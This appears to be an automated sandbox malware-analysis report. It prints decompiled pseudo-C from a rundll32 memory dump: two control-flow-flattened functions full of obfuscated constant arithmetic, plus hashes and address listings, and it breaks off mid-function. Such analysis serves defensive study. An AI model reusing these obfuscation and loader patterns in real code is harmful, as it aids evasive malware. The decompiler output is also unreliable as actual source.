                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 5NE$=$H/$X$]R$dklp
                                                                                                                                                            • API String ID: 0-668800459
                                                                                                                                                            • Opcode ID: c200b803dd34a2f1e36dd06abe1fd0fa77e563cf63561a23bbe9ea325f9788f5
                                                                                                                                                            • Instruction ID: d467766b80640084339a6eab68fd18b96fc4f308fb73a5b1dadf33f5f74c5a2c
                                                                                                                                                            • Opcode Fuzzy Hash: c200b803dd34a2f1e36dd06abe1fd0fa77e563cf63561a23bbe9ea325f9788f5
                                                                                                                                                            • Instruction Fuzzy Hash: 3ED11FB11087809FD3A9CF25C48A61BBBF1FBC5758F50891DF1AA86260DBB58949CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E00390F33() {
                                                                                                                                                            				signed int _t237;
                                                                                                                                                            				signed char _t246;
                                                                                                                                                            				signed short _t255;
                                                                                                                                                            				signed int _t262;
                                                                                                                                                            				signed char _t269;
                                                                                                                                                            				intOrPtr* _t292;
                                                                                                                                                            				signed short _t301;
                                                                                                                                                            				void* _t302;
                                                                                                                                                            				signed short _t306;
                                                                                                                                                            				signed int _t309;
                                                                                                                                                            				signed int _t310;
                                                                                                                                                            				signed int _t311;
                                                                                                                                                            				signed int _t312;
                                                                                                                                                            				signed int _t313;
                                                                                                                                                            				signed int _t314;
                                                                                                                                                            				signed int _t315;
                                                                                                                                                            				signed short _t319;
                                                                                                                                                            				void* _t321;
                                                                                                                                                            
                                                                                                                                                            				 *(_t321 + 0x20) = 0xee0abc;
                                                                                                                                                            				 *(_t321 + 0x20) =  *(_t321 + 0x20) | 0x247001dc;
                                                                                                                                                            				_t262 = 0x40ff1a8;
                                                                                                                                                            				 *(_t321 + 0x30) =  *(_t321 + 0x20) * 0xb;
                                                                                                                                                            				 *(_t321 + 0x30) =  *(_t321 + 0x30) ^ 0x96ee7e42;
                                                                                                                                                            				 *(_t321 + 0x14) = 0x97563a;
                                                                                                                                                            				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0xa3ba;
                                                                                                                                                            				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0x7434;
                                                                                                                                                            				_t309 = 0x68;
                                                                                                                                                            				 *(_t321 + 0x18) =  *(_t321 + 0x14) / _t309;
                                                                                                                                                            				 *(_t321 + 0x18) =  *(_t321 + 0x18) ^ 0x000fa3ad;
                                                                                                                                                            				 *(_t321 + 0x54) = 0x46dfd;
                                                                                                                                                            				_t310 = 0x22;
                                                                                                                                                            				 *(_t321 + 0x54) =  *(_t321 + 0x54) * 0x3f;
                                                                                                                                                            				 *(_t321 + 0x54) =  *(_t321 + 0x54) ^ 0x011c0bd3;
                                                                                                                                                            				 *(_t321 + 0x50) = 0x65d669;
                                                                                                                                                            				 *(_t321 + 0x50) =  *(_t321 + 0x50) >> 4;
                                                                                                                                                            				 *(_t321 + 0x50) =  *(_t321 + 0x50) ^ 0x0002663c;
                                                                                                                                                            				 *(_t321 + 0x1c) = 0xa5dab8;
                                                                                                                                                            				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) * 0x23;
                                                                                                                                                            				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 2;
                                                                                                                                                            				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) << 0xd;
                                                                                                                                                            				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x67379b84;
                                                                                                                                                            				 *(_t321 + 0x58) = 0x508bac;
                                                                                                                                                            				 *(_t321 + 0x58) =  *(_t321 + 0x58) + 0x81b9;
                                                                                                                                                            				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x005059a5;
                                                                                                                                                            				 *(_t321 + 0x38) = 0x6dc462;
                                                                                                                                                            				 *(_t321 + 0x38) =  *(_t321 + 0x38) / _t310;
                                                                                                                                                            				 *(_t321 + 0x38) =  *(_t321 + 0x38) | 0x03137037;
                                                                                                                                                            				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x03112268;
                                                                                                                                                            				 *(_t321 + 0x20) = 0x10f337;
                                                                                                                                                            				 *(_t321 + 0x20) =  *(_t321 + 0x20) << 0x10;
                                                                                                                                                            				_t311 = 0x7a;
                                                                                                                                                            				 *(_t321 + 0x1c) =  *(_t321 + 0x20) * 0x5e;
                                                                                                                                                            				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 3;
                                                                                                                                                            				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x09c781ed;
                                                                                                                                                            				 *(_t321 + 0x28) = 0x5a8e56;
                                                                                                                                                            				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x165ac6ba;
                                                                                                                                                            				 *(_t321 + 0x28) =  *(_t321 + 0x28) / _t311;
                                                                                                                                                            				 *(_t321 + 0x28) =  *(_t321 + 0x28) >> 6;
                                                                                                                                                            				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x000470dc;
                                                                                                                                                            				 *(_t321 + 0x40) = 0x558325;
                                                                                                                                                            				 *(_t321 + 0x40) =  *(_t321 + 0x40) | 0xb8e268f7;
                                                                                                                                                            				 *(_t321 + 0x40) =  *(_t321 + 0x40) + 0x4ee7;
                                                                                                                                                            				 *(_t321 + 0x40) =  *(_t321 + 0x40) ^ 0xb8f7e628;
                                                                                                                                                            				 *(_t321 + 0x3c) = 0x76576d;
                                                                                                                                                            				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) << 1;
                                                                                                                                                            				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) + 0xffff05d8;
                                                                                                                                                            				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) ^ 0x00efc885;
                                                                                                                                                            				 *(_t321 + 0x38) = 0x7fcfc;
                                                                                                                                                            				 *(_t321 + 0x38) =  *(_t321 + 0x38) >> 4;
                                                                                                                                                            				 *(_t321 + 0x38) =  *(_t321 + 0x38) * 0x1e;
                                                                                                                                                            				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x0005448a;
                                                                                                                                                            				 *(_t321 + 0x58) = 0x685aea;
                                                                                                                                                            				 *(_t321 + 0x58) =  *(_t321 + 0x58) | 0x7e49cfb4;
                                                                                                                                                            				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x7e6c4597;
                                                                                                                                                            				 *(_t321 + 0x24) = 0x2cb25b;
                                                                                                                                                            				 *(_t321 + 0x24) =  *(_t321 + 0x24) | 0x98b89101;
                                                                                                                                                            				 *(_t321 + 0x24) =  *(_t321 + 0x24) + 0x99b1;
                                                                                                                                                            				 *(_t321 + 0x24) =  *(_t321 + 0x24) << 5;
                                                                                                                                                            				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x17a3ab17;
                                                                                                                                                            				 *(_t321 + 0x20) = 0x5c4f5f;
                                                                                                                                                            				_t312 = 0x75;
                                                                                                                                                            				_t306 =  *(_t321 + 0x70);
                                                                                                                                                            				 *(_t321 + 0x24) =  *(_t321 + 0x20) * 0x3b;
                                                                                                                                                            				_t319 =  *(_t321 + 0x70);
                                                                                                                                                            				 *(_t321 + 0x24) =  *(_t321 + 0x24) / _t312;
                                                                                                                                                            				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b5669b3;
                                                                                                                                                            				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b72ed3d;
                                                                                                                                                            				 *(_t321 + 0x48) = 0x281dd4;
                                                                                                                                                            				 *(_t321 + 0x48) =  *(_t321 + 0x48) >> 8;
                                                                                                                                                            				 *(_t321 + 0x48) =  *(_t321 + 0x48) + 0xfffffe89;
                                                                                                                                                            				 *(_t321 + 0x48) =  *(_t321 + 0x48) ^ 0x000ef8bb;
                                                                                                                                                            				 *(_t321 + 0x60) = 0x5ec984;
                                                                                                                                                            				 *(_t321 + 0x60) =  *(_t321 + 0x60) + 0xefe6;
                                                                                                                                                            				 *(_t321 + 0x60) =  *(_t321 + 0x60) ^ 0x00516114;
                                                                                                                                                            				 *(_t321 + 0x4c) = 0xbf15d9;
                                                                                                                                                            				_t313 = 0x6c;
                                                                                                                                                            				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t313;
                                                                                                                                                            				_t314 = 0x6b;
                                                                                                                                                            				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t314;
                                                                                                                                                            				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) ^ 0x000706ff;
                                                                                                                                                            				 *(_t321 + 0x30) = 0x4468c3;
                                                                                                                                                            				_t315 = 0x7e;
                                                                                                                                                            				 *(_t321 + 0x2c) =  *(_t321 + 0x30) * 0x39;
                                                                                                                                                            				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) / _t315;
                                                                                                                                                            				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) * 0x49;
                                                                                                                                                            				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) ^ 0x08d90aee;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					L1:
                                                                                                                                                            					_t292 =  *0x393e08; // 0x0
                                                                                                                                                            					while(1) {
                                                                                                                                                            						L2:
                                                                                                                                                            						_t237 =  *(_t321 + 0x60);
                                                                                                                                                            						L3:
                                                                                                                                                            						while(_t262 != 0x160fcc4) {
                                                                                                                                                            							if(_t262 == 0x26954f0) {
                                                                                                                                                            								 *_t237 = _t319;
                                                                                                                                                            								_t262 = 0xfeff895;
                                                                                                                                                            								 *_t292 =  *_t292 + 1;
                                                                                                                                                            								_t237 = _t319;
                                                                                                                                                            								 *(_t321 + 0x60) = _t237;
                                                                                                                                                            								continue;
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t262 == 0x40ff1a8) {
                                                                                                                                                            									_t179 = _t292 + 0x20; // 0x20
                                                                                                                                                            									_t237 = _t179;
                                                                                                                                                            									_t262 = 0x5ead19b;
                                                                                                                                                            									 *(_t321 + 0x60) = _t237;
                                                                                                                                                            									continue;
                                                                                                                                                            								} else {
                                                                                                                                                            									if(_t262 == 0x58e8483) {
                                                                                                                                                            										_push(_t262);
                                                                                                                                                            										_push(_t262);
                                                                                                                                                            										_t302 = 0x40;
                                                                                                                                                            										_t319 = E00377FF2(_t302);
                                                                                                                                                            										__eflags = _t319;
                                                                                                                                                            										if(__eflags == 0) {
                                                                                                                                                            											goto L20;
                                                                                                                                                            										} else {
                                                                                                                                                            											_t262 = 0x160fcc4;
                                                                                                                                                            											goto L1;
                                                                                                                                                            										}
                                                                                                                                                            									} else {
                                                                                                                                                            										if(_t262 == 0x5ead19b) {
                                                                                                                                                            											_t255 = E00387BA6(_t321 + 0x6c,  *(_t321 + 0x38), __eflags,  *(_t321 + 0x18), 0x393000);
                                                                                                                                                            											 *(_t321 + 0x70) = _t255;
                                                                                                                                                            											_t306 = _t255;
                                                                                                                                                            											 *((intOrPtr*)(_t321 + 0x68)) = _t255 +  *((intOrPtr*)(_t321 + 0x68));
                                                                                                                                                            											_t262 = 0x58e8483;
                                                                                                                                                            											while(1) {
                                                                                                                                                            												L1:
                                                                                                                                                            												_t292 =  *0x393e08; // 0x0
                                                                                                                                                            												goto L2;
                                                                                                                                                            											}
                                                                                                                                                            										} else {
                                                                                                                                                            											if(_t262 == 0xd41016e) {
                                                                                                                                                            												E00388519( *(_t321 + 0x4c),  *(_t321 + 0x2c),  *((intOrPtr*)(_t321 + 0x6c)));
                                                                                                                                                            												L20:
                                                                                                                                                            												_t292 =  *0x393e08; // 0x0
                                                                                                                                                            											} else {
                                                                                                                                                            												if(_t262 != 0xfeff895) {
                                                                                                                                                            													L17:
                                                                                                                                                            													__eflags = _t262 - 0x20f61b3;
                                                                                                                                                            													if(__eflags != 0) {
                                                                                                                                                            														L2:
                                                                                                                                                            														_t237 =  *(_t321 + 0x60);
                                                                                                                                                            														continue;
                                                                                                                                                            													}
                                                                                                                                                            												} else {
                                                                                                                                                            													asm("sbb ecx, ecx");
                                                                                                                                                            													_t262 = (_t262 & 0xf84d8315) + 0xd41016e;
                                                                                                                                                            													continue;
                                                                                                                                                            												}
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            							 *(_t292 + 0x14) =  *(_t292 + 0x14) & 0x00000000;
                                                                                                                                                            							 *((intOrPtr*)(_t292 + 4)) =  *(_t292 + 0x20);
                                                                                                                                                            							__eflags = 1;
                                                                                                                                                            							return 1;
                                                                                                                                                            						}
                                                                                                                                                            						_push( *(_t321 + 0x1c));
                                                                                                                                                            						_push( *(_t321 + 0x38));
                                                                                                                                                            						 *((char*)(_t321 + 0x1b)) =  *((intOrPtr*)(_t306 + 1));
                                                                                                                                                            						 *((char*)(_t321 + 0x1a)) =  *((intOrPtr*)(_t306 + 2));
                                                                                                                                                            						E00381652( *(_t321 + 0x70), __eflags,  *(_t321 + 0x47) & 0x000000ff,  *(_t321 + 0x26) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x68)),  *(_t321 + 0x60), E0038DCF7( *((intOrPtr*)(_t321 + 0x5c)), 0x371590, __eflags), 0x10, _t319 + 0x1c,  *(_t321 + 0x70),  *(_t306 + 3) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x34)),  *(_t306 + 3) & 0x000000ff,  *(_t321 + 0x28));
                                                                                                                                                            						E0037A8B0( *((intOrPtr*)(_t321 + 0x80)), _t240,  *((intOrPtr*)(_t321 + 0x94)));
                                                                                                                                                            						_t321 = _t321 + 0x3c;
                                                                                                                                                            						 *(_t319 + 0x1a) = ( *(_t306 + 4) & 0x000000ff) << 0x00000008 |  *(_t306 + 5) & 0x000000ff;
                                                                                                                                                            						_t246 =  *((intOrPtr*)(_t306 + 6));
                                                                                                                                                            						_t269 =  *((intOrPtr*)(_t306 + 7));
                                                                                                                                                            						_t306 = _t306 + 8;
                                                                                                                                                            						_t262 = 0x26954f0;
                                                                                                                                                            						_t301 = (_t246 & 0x000000ff) << 0x00000008 | _t269 & 0x000000ff;
                                                                                                                                                            						__eflags = _t301;
                                                                                                                                                            						 *(_t319 + 0x18) = _t301;
                                                                                                                                                            						_t292 =  *0x393e08; // 0x0
                                                                                                                                                            						goto L17;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            			}





















                                                                                                                                                            0x0039103f
                                                                                                                                                            0x00391047
                                                                                                                                                            0x0039104f
                                                                                                                                                            0x0039105d
                                                                                                                                                            0x00391061
                                                                                                                                                            0x00391066
                                                                                                                                                            0x0039106e
                                                                                                                                                            0x00391076
                                                                                                                                                            0x0039107e
                                                                                                                                                            0x00391086
                                                                                                                                                            0x0039108e
                                                                                                                                                            0x00391096
                                                                                                                                                            0x0039109a
                                                                                                                                                            0x003910a2
                                                                                                                                                            0x003910aa
                                                                                                                                                            0x003910b2
                                                                                                                                                            0x003910bc
                                                                                                                                                            0x003910c0
                                                                                                                                                            0x003910c8
                                                                                                                                                            0x003910d0
                                                                                                                                                            0x003910d8
                                                                                                                                                            0x003910e0
                                                                                                                                                            0x003910e8
                                                                                                                                                            0x003910f0
                                                                                                                                                            0x003910f8
                                                                                                                                                            0x003910fd
                                                                                                                                                            0x00391107
                                                                                                                                                            0x00391116
                                                                                                                                                            0x00391119
                                                                                                                                                            0x0039111d
                                                                                                                                                            0x00391129
                                                                                                                                                            0x0039112d
                                                                                                                                                            0x00391131
                                                                                                                                                            0x00391139
                                                                                                                                                            0x00391141
                                                                                                                                                            0x00391149
                                                                                                                                                            0x0039114e
                                                                                                                                                            0x00391156
                                                                                                                                                            0x0039115e
                                                                                                                                                            0x00391166
                                                                                                                                                            0x0039116e
                                                                                                                                                            0x00391176
                                                                                                                                                            0x00391182
                                                                                                                                                            0x00391187
                                                                                                                                                            0x00391191
                                                                                                                                                            0x00391196
                                                                                                                                                            0x0039119c
                                                                                                                                                            0x003911a4
                                                                                                                                                            0x003911b1
                                                                                                                                                            0x003911b2
                                                                                                                                                            0x003911bc
                                                                                                                                                            0x003911c5
                                                                                                                                                            0x003911c9
                                                                                                                                                            0x003911d1
                                                                                                                                                            0x003911d1
                                                                                                                                                            0x003911d1
                                                                                                                                                            0x003911d7
                                                                                                                                                            0x003911d7
                                                                                                                                                            0x003911d7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003911db
                                                                                                                                                            0x003911ed
                                                                                                                                                            0x003912a8
                                                                                                                                                            0x003912aa
                                                                                                                                                            0x003912af
                                                                                                                                                            0x003912b1
                                                                                                                                                            0x003912b3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003911f3
                                                                                                                                                            0x003911f9
                                                                                                                                                            0x00391297
                                                                                                                                                            0x00391297
                                                                                                                                                            0x0039129a
                                                                                                                                                            0x0039129f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003911ff
                                                                                                                                                            0x00391205
                                                                                                                                                            0x00391277
                                                                                                                                                            0x00391278
                                                                                                                                                            0x0039127b
                                                                                                                                                            0x00391281
                                                                                                                                                            0x00391285
                                                                                                                                                            0x00391287
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0039128d
                                                                                                                                                            0x0039128d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0039128d
                                                                                                                                                            0x00391207
                                                                                                                                                            0x0039120d
                                                                                                                                                            0x0039124c
                                                                                                                                                            0x00391252
                                                                                                                                                            0x00391256
                                                                                                                                                            0x0039125d
                                                                                                                                                            0x00391261
                                                                                                                                                            0x003911d1
                                                                                                                                                            0x003911d1
                                                                                                                                                            0x003911d1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003911d1
                                                                                                                                                            0x0039120f
                                                                                                                                                            0x00391215
                                                                                                                                                            0x0039138c
                                                                                                                                                            0x00391392
                                                                                                                                                            0x00391392
                                                                                                                                                            0x0039121b
                                                                                                                                                            0x00391221
                                                                                                                                                            0x00391373
                                                                                                                                                            0x00391373
                                                                                                                                                            0x00391379
                                                                                                                                                            0x003911d7
                                                                                                                                                            0x003911d7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003911d7
                                                                                                                                                            0x00391227
                                                                                                                                                            0x0039122b
                                                                                                                                                            0x00391233
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00391233
                                                                                                                                                            0x00391221
                                                                                                                                                            0x00391215
                                                                                                                                                            0x0039120d
                                                                                                                                                            0x00391205
                                                                                                                                                            0x003911f9
                                                                                                                                                            0x0039139b
                                                                                                                                                            0x003913a1
                                                                                                                                                            0x003913a7
                                                                                                                                                            0x003913ac
                                                                                                                                                            0x003913ac
                                                                                                                                                            0x003912c4
                                                                                                                                                            0x003912ca
                                                                                                                                                            0x003912d5
                                                                                                                                                            0x003912dc
                                                                                                                                                            0x0039131e
                                                                                                                                                            0x00391333
                                                                                                                                                            0x0039133c
                                                                                                                                                            0x0039134a
                                                                                                                                                            0x0039134e
                                                                                                                                                            0x00391351
                                                                                                                                                            0x00391354
                                                                                                                                                            0x00391361
                                                                                                                                                            0x00391366
                                                                                                                                                            0x00391366
                                                                                                                                                            0x00391369
                                                                                                                                                            0x0039136d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0039136d
                                                                                                                                                            0x003911d7

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4t$=r;$_O\$mWv$N$Zh
                                                                                                                                                            • API String ID: 0-2036408213
                                                                                                                                                            • Opcode ID: 43a00201618f9fcfcf05d0cebaccb506694e36bd69328a155a18b2583dff38b1
                                                                                                                                                            • Instruction ID: e14e4cc02be6eb6bfbe3325ebdfd8dfc6e5a35aa98e92bc4e4df51f4889e1d86
                                                                                                                                                            • Opcode Fuzzy Hash: 43a00201618f9fcfcf05d0cebaccb506694e36bd69328a155a18b2583dff38b1
                                                                                                                                                            • Instruction Fuzzy Hash: A1C141715083819FC319CF25C48945BBFE1FBC9358F508A0EF59AAA260D3B5D949CF86
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                            			E0038D389(void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                            				char _v68;
                                                                                                                                                            				char _v72;
                                                                                                                                                            				signed int _v76;
                                                                                                                                                            				signed int _v80;
                                                                                                                                                            				signed int _v84;
                                                                                                                                                            				signed int _v88;
                                                                                                                                                            				signed int _v92;
                                                                                                                                                            				signed int _v96;
                                                                                                                                                            				signed int _v100;
                                                                                                                                                            				signed int _v104;
                                                                                                                                                            				signed int _v108;
                                                                                                                                                            				signed int _v112;
                                                                                                                                                            				signed int _v116;
                                                                                                                                                            				signed int _v120;
                                                                                                                                                            				signed int _v124;
                                                                                                                                                            				signed int _v128;
                                                                                                                                                            				signed int _v132;
                                                                                                                                                            				signed int _v136;
                                                                                                                                                            				signed int _v140;
                                                                                                                                                            				signed int _v144;
                                                                                                                                                            				signed int _v148;
                                                                                                                                                            				signed int _v152;
                                                                                                                                                            				signed int _v156;
                                                                                                                                                            				signed int _v160;
                                                                                                                                                            				signed int _v164;
                                                                                                                                                            				signed int _v168;
                                                                                                                                                            				void* __ecx;
                                                                                                                                                            				char _t245;
                                                                                                                                                            				void* _t263;
                                                                                                                                                            				signed int _t272;
                                                                                                                                                            				signed int _t273;
                                                                                                                                                            				signed int _t274;
                                                                                                                                                            				signed int _t275;
                                                                                                                                                            				signed int _t276;
                                                                                                                                                            				signed int _t277;
                                                                                                                                                            				void* _t280;
                                                                                                                                                            				void* _t306;
                                                                                                                                                            				intOrPtr _t307;
                                                                                                                                                            				char _t308;
                                                                                                                                                            				signed int* _t311;
                                                                                                                                                            
                                                                                                                                                            				_push(_a28);
                                                                                                                                                            				_t306 = __edx;
                                                                                                                                                            				_push(_a24);
                                                                                                                                                            				_push(0);
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(0);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_t245 = E003820B9(0);
                                                                                                                                                            				_v72 = _t245;
                                                                                                                                                            				_t311 =  &(( &_v168)[9]);
                                                                                                                                                            				_v84 = 0xd8cd3;
                                                                                                                                                            				_t307 = _t245;
                                                                                                                                                            				_v84 = _v84 ^ 0x2f0b54cb;
                                                                                                                                                            				_v84 = _v84 ^ 0x2f06dc18;
                                                                                                                                                            				_t280 = 0xd3d1227;
                                                                                                                                                            				_v116 = 0xdf2f98;
                                                                                                                                                            				_v116 = _v116 >> 4;
                                                                                                                                                            				_v116 = _v116 | 0xd629951a;
                                                                                                                                                            				_v116 = _v116 ^ 0xd62df7db;
                                                                                                                                                            				_v120 = 0x9d2532;
                                                                                                                                                            				_v120 = _v120 | 0x60368432;
                                                                                                                                                            				_v120 = _v120 << 1;
                                                                                                                                                            				_v120 = _v120 ^ 0xc1706bd2;
                                                                                                                                                            				_v104 = 0x3ed100;
                                                                                                                                                            				_v104 = _v104 >> 0xd;
                                                                                                                                                            				_v104 = _v104 << 0x10;
                                                                                                                                                            				_v104 = _v104 ^ 0x01fb42fe;
                                                                                                                                                            				_v132 = 0xac3ff1;
                                                                                                                                                            				_v132 = _v132 << 1;
                                                                                                                                                            				_v132 = _v132 ^ 0x8b709814;
                                                                                                                                                            				_v132 = _v132 + 0xffff5c55;
                                                                                                                                                            				_v132 = _v132 ^ 0x8a223f6b;
                                                                                                                                                            				_v164 = 0xc1955c;
                                                                                                                                                            				_v164 = _v164 + 0xe851;
                                                                                                                                                            				_v164 = _v164 >> 5;
                                                                                                                                                            				_t272 = 0x7c;
                                                                                                                                                            				_v164 = _v164 / _t272;
                                                                                                                                                            				_v164 = _v164 ^ 0x000d6983;
                                                                                                                                                            				_v76 = 0x371de3;
                                                                                                                                                            				_v76 = _v76 >> 1;
                                                                                                                                                            				_v76 = _v76 ^ 0x00157680;
                                                                                                                                                            				_v156 = 0xc7985;
                                                                                                                                                            				_v156 = _v156 + 0xffff997a;
                                                                                                                                                            				_v156 = _v156 + 0x5493;
                                                                                                                                                            				_v156 = _v156 ^ 0xa8ab967c;
                                                                                                                                                            				_v156 = _v156 ^ 0xa8a621f4;
                                                                                                                                                            				_v92 = 0xd6ada;
                                                                                                                                                            				_v92 = _v92 + 0xf102;
                                                                                                                                                            				_v92 = _v92 ^ 0x00049005;
                                                                                                                                                            				_v152 = 0xbb1df2;
                                                                                                                                                            				_t273 = 0x71;
                                                                                                                                                            				_v152 = _v152 * 0x37;
                                                                                                                                                            				_v152 = _v152 << 2;
                                                                                                                                                            				_v152 = _v152 + 0x7572;
                                                                                                                                                            				_v152 = _v152 ^ 0xa0c338c0;
                                                                                                                                                            				_v108 = 0xfb68a6;
                                                                                                                                                            				_v108 = _v108 / _t273;
                                                                                                                                                            				_v108 = _v108 * 0x38;
                                                                                                                                                            				_v108 = _v108 ^ 0x00745d8a;
                                                                                                                                                            				_v160 = 0x9cfb41;
                                                                                                                                                            				_v160 = _v160 >> 0xd;
                                                                                                                                                            				_v160 = _v160 + 0xffff2425;
                                                                                                                                                            				_v160 = _v160 | 0xc56bf860;
                                                                                                                                                            				_v160 = _v160 ^ 0xffffb927;
                                                                                                                                                            				_v100 = 0xcc3697;
                                                                                                                                                            				_v100 = _v100 << 9;
                                                                                                                                                            				_t274 = 0x3d;
                                                                                                                                                            				_v100 = _v100 / _t274;
                                                                                                                                                            				_v100 = _v100 ^ 0x027f162e;
                                                                                                                                                            				_v124 = 0x5e8102;
                                                                                                                                                            				_v124 = _v124 << 1;
                                                                                                                                                            				_v124 = _v124 >> 4;
                                                                                                                                                            				_v124 = _v124 ^ 0x000928e5;
                                                                                                                                                            				_v96 = 0x9a5083;
                                                                                                                                                            				_v96 = _v96 + 0xffff88fb;
                                                                                                                                                            				_v96 = _v96 | 0x7e2ee754;
                                                                                                                                                            				_v96 = _v96 ^ 0x7eb15945;
                                                                                                                                                            				_v168 = 0x417f4c;
                                                                                                                                                            				_v168 = _v168 + 0x30ef;
                                                                                                                                                            				_v168 = _v168 + 0xffff0fcf;
                                                                                                                                                            				_v168 = _v168 | 0x766f950c;
                                                                                                                                                            				_v168 = _v168 ^ 0x7667a907;
                                                                                                                                                            				_v148 = 0xeb5ea2;
                                                                                                                                                            				_v148 = _v148 >> 1;
                                                                                                                                                            				_v148 = _v148 | 0xdbfe62fd;
                                                                                                                                                            				_v148 = _v148 ^ 0xdbf81284;
                                                                                                                                                            				_v88 = 0xc982d2;
                                                                                                                                                            				_v88 = _v88 | 0xbf502ba4;
                                                                                                                                                            				_v88 = _v88 ^ 0xbfda3d08;
                                                                                                                                                            				_v80 = 0x51a7e7;
                                                                                                                                                            				_v80 = _v80 | 0xcf4b4eb1;
                                                                                                                                                            				_v80 = _v80 ^ 0xcf5d8599;
                                                                                                                                                            				_v140 = 0x112038;
                                                                                                                                                            				_v140 = _v140 >> 0xc;
                                                                                                                                                            				_v140 = _v140 | 0x79e3f6d0;
                                                                                                                                                            				_v140 = _v140 >> 0xc;
                                                                                                                                                            				_v140 = _v140 ^ 0x000d6368;
                                                                                                                                                            				_v144 = 0x3c4be1;
                                                                                                                                                            				_v144 = _v144 << 1;
                                                                                                                                                            				_t275 = 0x51;
                                                                                                                                                            				_v144 = _v144 / _t275;
                                                                                                                                                            				_t276 = 0x44;
                                                                                                                                                            				_v144 = _v144 / _t276;
                                                                                                                                                            				_v144 = _v144 ^ 0x0006a926;
                                                                                                                                                            				_v112 = 0xebe610;
                                                                                                                                                            				_t277 = 6;
                                                                                                                                                            				_v112 = _v112 / _t277;
                                                                                                                                                            				_v112 = _v112 ^ 0x8e2a0175;
                                                                                                                                                            				_v112 = _v112 ^ 0x8e0783c0;
                                                                                                                                                            				_v128 = 0x507b99;
                                                                                                                                                            				_v128 = _v128 ^ 0xb6dd86a4;
                                                                                                                                                            				_v128 = _v128 + 0xffff6e9b;
                                                                                                                                                            				_v128 = _v128 * 0x6f;
                                                                                                                                                            				_v128 = _v128 ^ 0x275b8ca8;
                                                                                                                                                            				_v136 = 0x1b49e9;
                                                                                                                                                            				_v136 = _v136 * 0x22;
                                                                                                                                                            				_v136 = _v136 ^ 0x6bc19a50;
                                                                                                                                                            				_v136 = _v136 ^ 0xda04c504;
                                                                                                                                                            				_v136 = _v136 ^ 0xb25c1cc6;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t280 != 0x9b6c7ef) {
                                                                                                                                                            						if(_t280 == 0xd3d1227) {
                                                                                                                                                            							_t280 = 0x9b6c7ef;
                                                                                                                                                            							continue;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t280 == 0xd8aa277) {
                                                                                                                                                            								E00389008(_v72, _v128, _v136);
                                                                                                                                                            							} else {
                                                                                                                                                            								_t317 = _t280 - 0xdb35d55;
                                                                                                                                                            								if(_t280 != 0xdb35d55) {
                                                                                                                                                            									goto L10;
                                                                                                                                                            								} else {
                                                                                                                                                            									_push(_v164);
                                                                                                                                                            									_push(_v132);
                                                                                                                                                            									_t308 = 0x44;
                                                                                                                                                            									E00374B61( &_v68, _t308);
